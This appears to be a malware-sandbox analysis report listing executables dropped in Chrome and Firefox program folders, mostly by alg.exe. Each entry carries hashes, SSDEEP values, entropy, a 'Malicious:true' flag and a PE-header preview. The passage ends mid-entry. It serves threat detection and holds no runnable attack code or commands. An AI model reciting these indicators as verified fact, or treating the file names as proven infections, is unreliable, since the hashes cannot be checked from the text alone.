                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....=.K... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.8297694974406715
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:q8ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKN:Lv2gM+qwXLg7pPgw/DSZlND527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:83A1C817E9E72D689EE419B756109AFE
                                                                                                                                                                                                                                                                                                                                                    SHA1:8E521FA33BDE5BD5BBA113A62CE19BBE1F4EB9C4
                                                                                                                                                                                                                                                                                                                                                    SHA-256:785E1AD72935B7C38C6D95249187A43D246D999F4D3E2D0AAADC58A20CEB1FF2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:215551BEAF884F8B2AC0DEE0802EC4E2DB3C0B35F3A74618A1E17EEB936C916BDC152FBDAC3C2DF81AD1AFA11FD6D2D03D5AB0D4C6F61C2B51D4C1248DE1F08E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.829770149517045
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:v8ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKN:4v2gM+qwXLg7pPgw/DSZlND527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:F6832237BB9E675131F9842F925276FC
                                                                                                                                                                                                                                                                                                                                                    SHA1:CFACA5325AA3623F37C78537B9240C64BF9D68D7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:72E962CBFF4F3EBE93F60B7FBA0830CCEC7D43F7802979F44922D52D7555560D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:7BC412AC1EE21F0AEE236C3DCD579B787F5D7598F2BEFB2BE7584D51D4A85048D44D8741E024FB95E9A6B00C5D36F90AD5CA53CDF22955FE579B53BE6A5EEE2C
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L......dK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.9535858053824064
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:wtjqL8fH+8aUbp8D/8+xJWAlsqjnhMgeiCl7G0nehbGZpbD:8jKK+81FI/8o3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:264EC33CC1953C752E99AB060E79C157
                                                                                                                                                                                                                                                                                                                                                    SHA1:EDA03394A4102FD2939414F200BEC28B21A7CAD2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:AFBE83B3A212A34D22903A275A3D38ACF841BCD521D0879E68B0F18194B0195C
                                                                                                                                                                                                                                                                                                                                                    SHA-512:76777B5DF63363D9472C623457FA7BC205D0745F5A4EE38CA1D5BCAEDB88D1A37632D7FF2293E58D68BF40A8F20BFC7200DC413C6BD9BE59CAC63A11303A1F68
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......F.....................@.............................P".....(.!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.03239066918582
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:eAMsOu3JfCIGnZuTodRFYKBrFIbWp9Dmg27RnWGj:eAMa38ZuTS3D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:FDA90B2C857B9C8712D77E15CA3845EA
                                                                                                                                                                                                                                                                                                                                                    SHA1:75EBE8E9194A12BE88C5BA61D8C00D3DEE60F0D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:8BFFA9D6913C417361B30B2880B9210376A3D575FB580D33DFEDB86FA00DDF5A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:33ED32DF45FCEF32EFFF2CC5EFC194DA38FC09B0045BE49978F8E1728A33D6AEDF7488DD6718FE1028738DECA2ED38A49093AE264D71ED10FF3BEF1D092D5D1A
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.104346106804214
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:dwbK7tnhD4aH6wD2Krx5NgOOagWE84IsqjnhMgeiCl7G0nehbGZpbD:dSK7Fhslq2EPfOQEYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:E07F024AD50EF77B6AB1CD69A214BE86
                                                                                                                                                                                                                                                                                                                                                    SHA1:5489924C0026BAF1EDEB737AA8F556809B7CCB1E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E73C79298AA5535284C66C2FA2CD2DF5D62A1A179CCE027EBA3462CE8E5B9034
                                                                                                                                                                                                                                                                                                                                                    SHA-512:90006751320F702BA87E7DECC46D9B35AAC4375956BA1A2D65451FBC7A55690F8E7885F5F0AE5B6553221F14C901EDE8AB80AC277DD933BBC3D19A6EDCA4707D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.158070032573331
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:cKI7Twj5KDHxJ1FxyD+/wsG1pbbxYsqjnhMgeiCl7G0nehbGZpbD:cv7e0j31mD+/wDxbWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:F4F3185A039E7BEECCD93095292F567F
                                                                                                                                                                                                                                                                                                                                                    SHA1:4D6AF4F2B162EEE237B1B373953C84EFC8F15CA1
                                                                                                                                                                                                                                                                                                                                                    SHA-256:72E8AB42F2EA4411D095E7C5831B8D1FDED6E0582E2EDEFB3F0F2B43EAFF8D38
                                                                                                                                                                                                                                                                                                                                                    SHA-512:7A4C90317B868844B8D9691DC80C6DE55B4AC3C72145FA0137F41048E7979D0158574DBFBF6E73B06F86284EEA7F9B7DA7C19931A8926B922E9457FA3CCC9415
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.377440413175293
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SQUVPDHhSrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:FyhSrsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:D597EFE7E48A8C541950161C0F583D2C
                                                                                                                                                                                                                                                                                                                                                    SHA1:E915AA8008113A009FA7C8316827872D3BE16345
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7A6EAFCCE92F0FA06DEBE1D6E322FBE6C1EDB81302FFABFDF30029E8211566CA
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8CE5BCC4373C77D03940D9857AD1D26F032E37E5FC4EDB92051FA9EB66200066FAC64DCA2B963B6A9F033A156946CA6B407053FF6F52844C46BE11BD4E2528D9
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......&..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.222123140527126
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:ssFfc1VyFn5UQn652bO4HQsqjnhMgeiCl7G0nehbGZpbD:ssFcIn5rJWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:022ADB97751A43B5B79EA67E3A1BA9AC
                                                                                                                                                                                                                                                                                                                                                    SHA1:A51C11BE8FD83896C190CADDBA377347C7293043
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B5549EEAF9E0598F19E6554F98B1A039E09D27C435B17FE590FA6374CF8E1085
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0A284006C0299CC6D9B76F47F0F8544655BA43B1AC5574CE85EC44C582341557345D9A9D6EA1A3A336E1327CEFD596C26C8FAA12AB2C903429BED97D794542AB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................I..... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.494290926708551
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Bt9o6p4xQbiKI69wpemIwpel93sqjnhMgeiCl7G0nehbGZpbD:Bt9faQbtl2peapel1Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:6F78CF3A7A73C53BCF1590D0CCDBAB25
                                                                                                                                                                                                                                                                                                                                                    SHA1:F3935C82AB9E30B8A73E4316211906ED59D47096
                                                                                                                                                                                                                                                                                                                                                    SHA-256:26B390AA741DFD8930B65AC50AE715B0DF8353FE62028F9D102D7C67F259B586
                                                                                                                                                                                                                                                                                                                                                    SHA-512:00FC4A2C0DD957148986F2F4339EEB3FFCE2301C451A35BA4E97BBDEDACE7A3AFD2E53B7A786E70D1F5B3B48110FAA0E932D7E462B3EC4D06B6E73863A100337
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.347843811104141
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:+QVTZu0J4sqjnhMgeiCl7G0nehbGZpbD:lVTZulDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:169D0903363BAAB2EA1A36F40FCB0E62
                                                                                                                                                                                                                                                                                                                                                    SHA1:B226FBC2AF772335ABA997FC568B5BA037B745DD
                                                                                                                                                                                                                                                                                                                                                    SHA-256:AB00F1F64A87384DC53C3A9B4795F1D8E55C96D2C1DB5BE002E521E9A8BE17F2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:418A9F7A15FFAECD67DEBE702F5C5C7D9BC1B3DCD036976E25E2D3B8744761A80C8973EAC9A8A0FBD1618960D7ABBC94C795A85B3F8D8BCFF325731DC297DB06
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.808417125045837
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:TC1vpgXcZHzCsqjnhMgeiCl7G0nehbGZpbD:TC1vpIcNGDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:2CA9ABE494F35B561E7ED4888CF62B31
                                                                                                                                                                                                                                                                                                                                                    SHA1:ADF872ED6F2DE3D47DA6FB69DC0642FDEDA9839A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:8BCBD160EF8730021B0A94B93AFB62403C7BA8D8EBEBC5F0C9B14C69E544D441
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C6963C7F806A292C8034E8006F5F7FFEAA0C9A2B2B383CE16341E00DDCC4EE71DC807A12F97E641053FB17DDE85D6981E070B11A99F83AD1E57F237713CF6209
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................Zb.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.140029777988957
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qSwj+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qv+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:F91117F64FDEABA0DF5FF57AD138946B
                                                                                                                                                                                                                                                                                                                                                    SHA1:3499D360AB159FEECB418428DA5F4DCD0DAE34EB
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1FE442A2343EB4A0179AC62661EEFF1FC36898995FD131BB72081C348E42E969
                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED1C2989794209B75DEBDEA553A7C6C44D01B4835A66FAA3EAFE953708B58A38FC5D97820AFEFFF79BB4EF8189276604A49A498F81EB279D9F99A84836D7C144
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................]..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441162970983243
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:YWKntIfGpIsqjnhMgeiCl7G0nehbGZpbD:T8IeODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:92DA7A4B191708715EFE6F6AEB138977
                                                                                                                                                                                                                                                                                                                                                    SHA1:F80B98C41B42C6E9D780A83FD9B54EFB2D2FE382
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E3A310B7E4B6DC8543195F421F0665C0C4196AD6780BD3CE86A5F3DE1CDBC8E3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:495579677FAA473E111FC838B1DB46D08F8C3AD33CEEB1F0DFFF77833C9F89627F570C26D20295C8A6E7F1ACF48C3BD1038D71E3B5CDC81F5FF00A0236ECACC6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................W.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.103288587510427
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:GIhaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:basqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:764B49B666D98DBB1BDF2138462086BD
                                                                                                                                                                                                                                                                                                                                                    SHA1:FEEC3119EF955A1CE7AC02B579191B2512854943
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A4EB46CA32F9267401AA0F229D5DC6B88E622519125B26CBC33AC18811A0EB29
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C80F24275E7E42951E8DB4036288457DC7197B771C3BD9E5B9D1BD1F41F497118FF02C08F644ADC65F25811DA273D58E9432D861B33187C01CFA998EFAFCCA70
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1531904
